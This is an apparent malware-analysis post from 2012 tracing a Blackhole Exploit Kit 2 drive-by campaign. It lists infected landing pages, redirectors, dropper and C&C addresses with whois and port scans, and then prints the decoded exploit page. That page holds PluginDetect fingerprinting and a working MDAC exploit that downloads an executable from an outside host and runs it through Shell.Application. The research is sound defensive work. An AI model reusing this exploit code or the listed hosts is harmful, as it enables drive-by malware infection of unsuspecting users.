=====================================================
#MalwareMustDie!!!!!!!!!!!! | Sat Oct 27 18:29:21 JST 2012
FreeBSD unixfreaxjp 9.0-RELEASE-p4 FreeBSD 9.0-RELEASE-p4 #
This is a large BHEK2 infection, hinted by @xxxxrxero and followed up by @unixfreaxjp
Hit by the MDAC exploit; the infection downloaded the Trojan/Backdoor/Encrypt/Downloader `03ab326.exe' saved [256784/256784]
I am pretty sure this one is ZeuS, since the detection ratio on VT is still too low.
url: h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
Also drops other troj: h00p://4.icedambusters.com/adobe/update_flash_player.exe
Referer points to: 74.200.211.205
CNC: 198.143.159.66
After infection by 03ab326.exe it also downloaded THREE MORE TROJANS from:
h00p://springbackcolorado.com/CaBPXFg.exe
h00p://180degrees.org.nz/cXbAC.exe
h00p://weareseasons.com/7yoZf5.exe
PluginDetect VT(5/44): h00ps://www.virustotal.com/file/ebf5a59e4f7212cca87a6b6bf9d646189674f40c3d0f765a2adf62b9ba0a9ca4/analysis/1351330706/
Troj Downloader VT(8/44): h00ps://www.virustotal.com/file/94258a10d190c941b697246453974bd892f63c77880073674ee1759fa550f5b8/analysis/1351330579/
The Trojan Zbot(Main) VT(4/44): h00ps://www.virustotal.com/file/166c1a35cf4f24e3678ad0d2c863b95d8a49448915bfcf31eccb5412d9b1ca8e/analysis/1351330452/
======================================================
========================
INFECTIONS SCHEME
========================
#include Hint: HINT.TXT;
---------------------------------------------------------------------------------------------------------------------------...
LANDING PAGE | JS.JS (REDIRECTOR) | PLUGIN DETECT (OBFS) |
---------------------------------------------------------------------------------------------------------------------------...
h00p://50.63.137.176/8jorLtGh/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://a1stopshop.in/DAE4v3m/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://acura.hightestonline.com/2cE8GLPY/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://agriculturaenmarcha.com/5tNBJdC/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://blt-photography.com/9UEazEmw/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://cefoai.com/9TFzUf/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://churchjef.com/3Mn4rs/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://elefti.com/4yxcpfn/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://estoesxicotepec.com.mx/1dKmuBp8/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://financialportal.co.za/1G6V26b/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://kocaudio.com/yaxF05nC/js.js | h00p://srv.michigancrotchrockets.com/links/return-west.php |
h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://agritech.com.ve/MtkRFd3k/js.js | h00p://srv.michigancrotchrockets.com/links/return-west.php |
h00p://infotrex.com/bq9MGi/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://interambiente.altervista.org/88DTb1S7/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://littlecreekinc.com/9LAfwJz/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://motosikletsasesi.com/11qX8KCB/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://netguandisenoweb.com/1fp3PP/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://new.artofimagination.com/5dLS24/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://oneryavuz.com/abMBVR/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://optikcim.com/5RRvjA8/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://ortizplans.com/43wKes/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://pose-frette.gmxhome.de/66jzk4q/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://potter.com.hk/6UTxen/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://rajiv.stealbackyourppcprofits.com/AtdNGGH/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://rapblast.com/Af1Msc/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://safeguardlcs.com/M90nh9/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://sanypet.it/7hKxQao/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://southsnetball.asn.au/21drY7/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://superiorshine-carwash.com/5M2M4Mh/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://testsites1.com/9bMNvy/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://trailblazers.org/8AvgUm/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://tranzzactn.com/075V7po/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://ventanasdesanmiguel.net/3ADRuw/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://www.alicil.com/0yUWvU/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://www.emiliacenterdownload.com/3p9rovT/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://www.jonespark.com/46YdTk/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://www.prettyleg.idv.tw/dvYhPu/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://www.rosesocietyjbp.com/1xt74Jy1/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://yesilhoca.com/09DFUG7F/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://zalesie-gorne.home.pl/0qU3MX/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
==================================
INFECTOR DETAILS;
74.200.211.205
==================================
NetRange: 74.200.192.0 - 74.200.255.255
CIDR: 74.200.192.0/18
OriginAS: AS16805, AS22576
NetName: LAYERED-TECH-CHI
NetHandle: NET-74-200-192-0-1
Parent: NET-74-0-0-0-0
NetType: Direct Allocation
RegDate: 2006-11-14
Updated: 2012-02-24
Ref: h00p://whois.arin.net/rest/net/NET-74-200-192-0-1
OrgName: Layered Technologies, Inc.
OrgId: LAYER-3
Address: 5085 W Park Blvd
Address: Suite 700
City: Plano
StateProv: TX
PostalCode: 75093
Country: US
RegDate: 2004-07-21
Updated: 2010-08-13
Comment: Please send all abuse complaints to abuse@layeredtech.com
Ref: h00p://whois.arin.net/rest/org/LAYER-3
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
26/tcp closed unknown
53/tcp open domain
80/tcp open h00p
110/tcp open pop3
143/tcp closed imap
443/tcp open h00ps
587/tcp open submission
993/tcp closed imaps
995/tcp closed pop3s
No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B9336%O=21%C=26)
TSeq(Class=TR%IPID=I%TS=0)
T1(Resp=Y%DF=N%W=4000%ACK=S++%Flags=AS%Ops=MNWNNT)
T2(Resp=N)
T3(Resp=N)
T4(Resp=N)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
==================================
CNC / CONTROL DETAILS;
IP: 198.143.159.66
==================================
NetRange: 198.143.128.0 - 198.143.191.255
CIDR: 198.143.128.0/18
OriginAS: AS32475
NetName: SINGLEHOP
NetHandle: NET-198-143-128-0-1
Parent: NET-198-0-0-0-0
NetType: Direct Allocation
RegDate: 2012-05-16
Updated: 2012-05-16
Ref: h00p://whois.arin.net/rest/net/NET-198-143-128-0-1
OrgName: SingleHop, Inc.
OrgId: SINGL-8
Address: 621 W. Randolph St.
Address: 3rd Floor
City: Chicago
StateProv: IL
PostalCode: 60661
Country: US
RegDate: 2007-03-07
Updated: 2010-03-23
Comment: h00p://www.singlehop.com/
Ref: h00p://whois.arin.net/rest/org/SINGL-8
PORT STATE SERVICE
22/tcp open ssh
80/tcp open h00p
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B94D1%O=22%C=1)
TSeq(Class=TR%IPID=Z%TS=1000HZ)
T1(Resp=Y%DF=Y%W=3890%ACK=S++%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
T3(Resp=N)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
============================================
Grab the pluginDetect & you get the CNC!
============================================
$ myfetch --h00p_proxy=yes
--user-agent="Mozila/4.3(X11; U; MacOSX)"
--cookies=on --keep-session-cookies --save-cookies mycookies.txt
--referer="h00p://74.200.211.205/SQeyUUzT/js.js"
--target="h00p://ser.luckypetspetsitting.com/links/return-west.php"
// w/tor
--16:21:02-- h00p://ser.luckypetspetsitting.com/links/return-west.php
=> `return-west.php'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 502 Bad Gateway
16:21:14 ERROR 502: Bad Gateway.
// gatling IP
--16:21:34-- h00p://ser.luckypetspetsitting.com/links/return-west.php
=> `return-west.php'
Resolving ser.luckypetspetsitting.com... 198.143.159.66
Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: unspecified [text/html]
16:21:37 (131.58 KB/s) - `return-west.php' saved [28878]
============================
DECODING ANALYSIS
===========================
//Wepawet OK, jsunpack BAD, Malzilla OK, Revello BAD, SteamDumper OK
---------------------------------------------------------------------------------------
// BHEK2 Plugin Detect.....these morons never learn...
// I won't spend my time on the PDF and jar; I aimed straight at the PE infectors..
// You guys can go ahead with the jar and PDF
// rgds, @unixfreaxjp
try {
var PluginDetect = {
version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
return function (){
c(b, a)
}
}
, isDefined : function (b){
return typeof b != "undefined"
}
, isArray : function (b){
return (/array/i).test(Object.prototype.toString.call(b))
}
, isFunc : function (b){
return typeof b == "function"
}
, isString : function (b){
return typeof b == "string"
}
, isNum : function (b){
return typeof b == "number"
}
, isStrNum : function (b){
return (typeof b == "string" && (/\d/).test(b))
}
, getNumRegx : /[\d][\d\.\_,-]*/, splitNumRegx : /[\.\_,-]/g,
getNum : function (b, c){
var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
exec(b) : null;
return a ? a[0] : null
}
, compareNums : function (h, f, d){
var e = this , c, b, a, g = parseInt;
if (e.isStrNum(h) && e.isStrNum(f)){
if (e.isDefined(d) && d.compareNums){
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for (a = 0; a < Math.min(c.length, b.length);
a ++ ){
if (g(c[a], 10) > g(b[a], 10)){
return 1
}
if (g(c[a], 10) < g(b[a], 10)){
return - 1
}
}
}
return 0
}
, formatNum : function (b, c){
var d = this , a, e;
if (!d.isStrNum(b)){
return null
}
if (!d.isNum(c)){
c = 4
}
c--;
e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for (a = 0; a < 4; a ++ ){
if (/^(0+)(.+)$/.test(e[a])){
e[a] = RegExp.$2
}
if (a > c ||! (/\d/).test(e[a])){
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
}
, $$hasMimeType : function (a){
return function (c){
if (!a.isIE && c){
var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
for (b = 0; b < d.length; b ++ ){
if (a.isString(d[b]) && /[^\s]/.test(d[b])){
f = navigator.mimeTypes[d[b]];
e = f ? f.enabledPlugin : 0;
if (e && (e.name || e.description)){
return f
}
}
}
}
return null
}
}
, findNavPlugin : function (l, e, c){
var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ? /\d/ : 0, k = c ?
new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
for (f = 0; f < a.length; f ++ ){
m = a[f].description || g;
b = a[f].name || g;
if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
if (!k ||! (k.test(m) || k.test(b))){
return a[f]
}
}
}
return null
}
, getMimeEnabledPlugin : function (k, m, c){
var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
l, d, j = e.isString(k) ? [k] : k;
for (d = 0; d < j.length; d ++ ){
if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
l = f.description || h;
a = f.name || h;
if (b.test(l) || b.test(a)){
if (!g ||! (g.test(l) || g.test(a))){
return f
}
}
}
}
return 0
}
, getPluginFileVersion : function (f, b){
var h = this , e, d, g, a, c =- 1;
if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
return b
}
if (!b){
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for (a = 0; a < d.length; a ++ ){
if (c >- 1 && a > c && d[a] != "0"){
return b
}
if (g[a] != d[a]){
if (c ==- 1){
c = a
}
if (d[a] != "0"){
return b
}
}
}
return e
}
, AXO : window.ActiveXObject, getAXO : function (a){
var f = null, d, b = this , c = {
}
;
try {
f = new b.AXO(a)
}
catch (d){
}
return f
}
, convertFuncs : function (f){
var a, g, d, b = /^[\$][\$]/, c = this ;
for (a in f){
if (b.test(a)){
try {
g = a.slice(2);
if (g.length > 0 &&! f[g]){
f[g] = f[a](f);
delete f[a]
}
}
catch (d){
}
}
}
}
, initObj : function (e, b, d){
var a, c;
if (e){
if (e[b[0]] == 1 || d){
for (a = 0; a < b.length; a = a + 2){
e[b[a]] = b[a + 1]
}
}
for (a in e){
c = e[a];
if (c && c[b[0]] == 1){
this .initObj(c, b)
}
}
}
}
, initScript : function (){
var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
b = a.platform || "", h = a.product || "";
c.initObj(c, ["$", c]);
for (f in c.Plugins){
if (c.Plugins[f]){
c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
}
}
;
c.OS = 100;
if (b){
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
, 100];
for (f = d.length - 2; f >= 0; f = f - 2){
if (d[f] && new RegExp(d[f], "i").test(b)){
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
"body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
null ;
c.ActiveXEnabled = false;
if (c.isIE){
var f, j = ["Msxml2.XMLh00p", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
"ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
"Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f < j.length; f ++ ){
if (c.getAXO(j[f])){
c.ActiveXEnabled = true;
break
}
}
}
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
"0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
}
, init : function (d){
var c = this , b, d, a = {
status :- 3, plugin : 0
}
;
if (!c.isString(d)){
return a
}
if (d.length == 1){
c.getVersionDelimiter = d;
return a
}
d = d.toLowerCase().replace(/\s/g, "");
b = c.Plugins[d];
if (!b ||! b.getVersion){
return a
}
a.plugin = b;
if (!c.isDefined(b.installed)){
b.installed = null;
b.version = null;
b.version0 = null;
b.getVersionDone = null;
b.pluginName = d
}
c.garbage = false;
if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
a.status =- 2;
return a
}
a.status = 1;
return a
}
, fPush : function (b, a){
var c = this ;
if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
])))){
a.push(b)
}
}
, callArray : function (b){
var c = this , a;
if (c.isArray(b)){
for (a = 0; a < b.length; a ++ ){
if (b[a] === null){
return
}
c.call(b[a]);
b[a] = null
}
}
}
, call : function (c){
var b = this , a = b.isArray(c) ? c.length :- 1;
if (a > 0 && b.isFunc(c[0])){
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
}
else {
if (b.isFunc(c)){
c(b)
}
}
}
, getVersionDelimiter : ",", $$getVersion : function (a){
return function (g, d, c){
var e = a.init(g), f, b, h = {
}
;
if (e.status < 0){
return null
}
;
f = e.plugin;
if (f.getVersionDone != 1){
f.getVersion(null, d, c);
if (f.getVersionDone === null){
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
}
, cleanup : function (){
}
, addWinEvent : function (d, c){
var e = this , a = window, b;
if (e.isFunc(c)){
if (a.addEventListener){
a.addEventListener(d, c, false)
}
else {
if (a.attachEvent){
a.attachEvent("on" + d, c)
}
else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
}
, winHandler : function (d, c){
return function (){
d();
if (typeof c == "function"){
c()
}
}
}
, WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
var b = {
}
;
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if (a.onDoneEmptyDiv){
a.onDoneEmptyDiv()
}
}
, winLoaded : false, $$onWindowLoaded : function (a){
return function (b){
if (a.winLoaded){
a.call(b)
}
else {
a.fPush(b, a.WLfuncs)
}
}
}
, div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
function (){
var d = this , b, h, c, a, f, g;
if (d.div && d.div.childNodes){
for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
c = d.div.childNodes[b];
if (c && c.childNodes){
for (h = c.childNodes.length - 1; h >= 0; h -- ){
g = c.childNodes[h];
try {
c.removeChild(g)
}
catch (f){
}
}
}
if (c){
try {
d.div.removeChild(c)
}
catch (f){
}
}
}
}
if (!d.div){
a = document.getElementById(d.divID);
if (a){
d.div = a
}
}
if (d.div && d.div.parentNode){
try {
d.div.parentNode.removeChild(d.div)
}
catch (f){
}
d.div = null
}
}
, DONEfuncs : [], onDoneEmptyDiv : function (){
var c = this , a, b;
if (!c.winLoaded){
return
}
if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
return
}
for (a in c){
b = c[a];
if (b && b.funcs){
if (b.OTF == 3){
return
}
if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
return
}
}
}
for (a = 0; a < c.DONEfuncs.length; a ++ ){
c.callArray(c.DONEfuncs)
}
c.emptyDiv()
}
, getWidth : function (c){
if (c){
var a = c.scrollWidth || c.offsetWidth, b = this ;
if (b.isNum(a)){
return a
}
}
return - 1
}
, getTagStatus : function (m, g, a, b){
var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
g.span, i = c.getWidth(d);
if (!k ||! h ||! d ||! c.getDOMobj(m)){
return - 2
}
if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
return 0
}
if (l >= i){
return - 1
}
try {
if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
if (!m.winLoaded && c.winLoaded){
return 1
}
if (m.winLoaded && c.isNum(b)){
if (!c.isNum(m.count)){
m.count = b
}
if (b - m.count >= 10){
return 1
}
}
}
}
catch (f){
}
return 0
}
, getDOMobj : function (g, a){
var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
try {
if (b && a){
d.div.focus()
}
}
catch (f){
}
return b ? c.firstChild : null
}
, setStyle : function (b, g){
var f = b.style, a, d, c = this ;
if (f && g){
for (a = 0; a < g.length; a = a + 2){
try {
f[g[a]] = g[a + 1]
}
catch (d){
}
}
}
}
, insertDivInBody : function (a, i){
var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
if (!g){
try {
j.write(c + 'div id="' + b + '">o' + c + "/div>");
d = j.getElementById(b)
}
catch (h){
}
}
g = (j.getElementsByTagName("body")[0] || j.body);
if (g){
if (g.firstChild && f.isDefined(g.insertBefore)){
g.insertBefore(a, g.firstChild)
}
else {
g.appendChild(a)
}
if (d){
g.removeChild(d)
}
}
else {
}
}
, insertHTML : function (g, b, h, a, l){
var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
"0px", "visibility", "visible"];
var i =
"outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
if (!k.isDefined(a)){
a = ""
}
if (k.isString(g) && (/[^\s]/).test(g)){
g = g.toLowerCase().replace(/\s/g, "");
q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
q += 'style="' + i + 'display:inline;" ';
for (o = 0; o < b.length; o = o + 2){
if (/[^\s]/.test(b[o + 1])){
q += b[o] + '="' + b[o + 1] + '" '
}
}
q += ">";
for (o = 0; o < h.length; o = o + 2){
if (/[^\s]/.test(h[o + 1])){
q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
}
}
q += a + f + "/" + g + ">"
}
else {
q = a
}
if (!k.div){
j = n.getElementById(k.divID);
if (j){
k.div = j
}
else {
k.div = n.createElement("div");
k.div.id = k.divID
}
k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
+ "px", "verticalAlign", "baseline", "display", "block"]));
if (!j){
k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
k.insertDivInBody(k.div)
}
}
if (k.div && k.div.parentNode){
k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
p.innerHTML = q
}
catch (m){
}
;
try {
k.div.appendChild(p)
}
catch (m){
}
;
return {
span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
}
}
return {
span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
}
}
, Plugins : {
adobereader : {
mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
"PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
{
}
, pluginHasMimeType : function (d, c, f){
var b = this , e = b.$, a;
for (a in d){
if (d[a] && d[a].type && d[a].type == c){
return 1
}
}
if (e.getMimeEnabledPlugin(c, f)){
return 1
}
return 0
}
, getVersion : function (l, j){
var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
if (d.isString(j)){
j = j.replace(/\s/g, "");
if (j){
k = j
}
}
else {
j = null
}
if (d.isDefined(g.INSTALLED[k])){
g.installed = g.INSTALLED[k];
return
}
if (!d.isIE){
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if (g.getVersionDone !== 0){
g.getVersionDone = 0;
b = d.getMimeEnabledPlugin(g.mimeType, a);
if (!j){
n = b
}
if (!b && d.hasMimeType(g.mimeType)){
b = d.findNavPlugin(a, 0)
}
if (b){
g.navPluginObj = b;
h = d.getNum(b.description) || d.getNum(b.name);
h = d.getPluginFileVersion(b, h);
if (!h && d.OS == 1){
if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
h = "9"
}
else {
if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
h = "8"
}
}
}
}
}
else {
h = g.version
}
if (!d.isDefined(n)){
n = d.getMimeEnabledPlugin(k, a)
}
g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
}
else {
b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
c = /=\s*([\d\.]+)/g;
try {
f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
""], "", g))).GetVersions();
for (m = 0; m < 5; m ++ ){
if (c.test(f) && (!h || RegExp.$1 > h)){
h = RegExp.$1
}
}
}
catch (i){
}
g.installed = h ? 1 : (b ? 0 :- 1)
}
if (!g.version){
g.version = d.formatNum(h)
}
g.INSTALLED[k] = g.installed
}
}
, zz : 0
}
}
;
PluginDetect.initScript();
PluginDetect.getVersion(".");
pdfver = PluginDetect.getVersion("AdobeReader");
}
catch (e){
}
if (typeof pdfver == 'string'){
pdfver = pdfver.split('.')
}
else {
pdfver = [0, 0, 0, 0]
}
function x(s){
d = [];
for (i = 0; i < s.length; i ++ ){
k = (s.charCodeAt(i) - 46).toString(16);
if (k.length == 1)k = "0" + k;
d.push(k);
}
;
return d.join("");
}
end_redirect = function (){
window.location.href = 'h00p://4.icedambusters.com/adobe/update_flash_player.exe';
}
;
window.onbeforeunload = function (){
return "";
}
;
try {
var ra4 = ".//..//03ab326.exe", ra3 = document.createElement("object");
ra3.setAttribute("id", ra3);
ra3.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
try {
var ra0 = ra3.CreateObject("adod".concat("b.str", "eam"), ""), ra1 = ra3.CreateObject(
"Shell.Application", ""), ra2 = ra3.CreateObject("msxml2.XMLh00p", "");
try {
ra2.open("GET", "h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy", false);
ra2.send();
ra0.type = 1;
ra0.open();
ra0.Write(ra2.responseBody);
ra0.SaveToFile(ra4, 2);
ra0.Close();
}
catch (e){
}
try {
with (ra1){
shellexecute(ra4);
}
}
catch (e){
}
}
catch (e){
}
}
catch (errno){
}
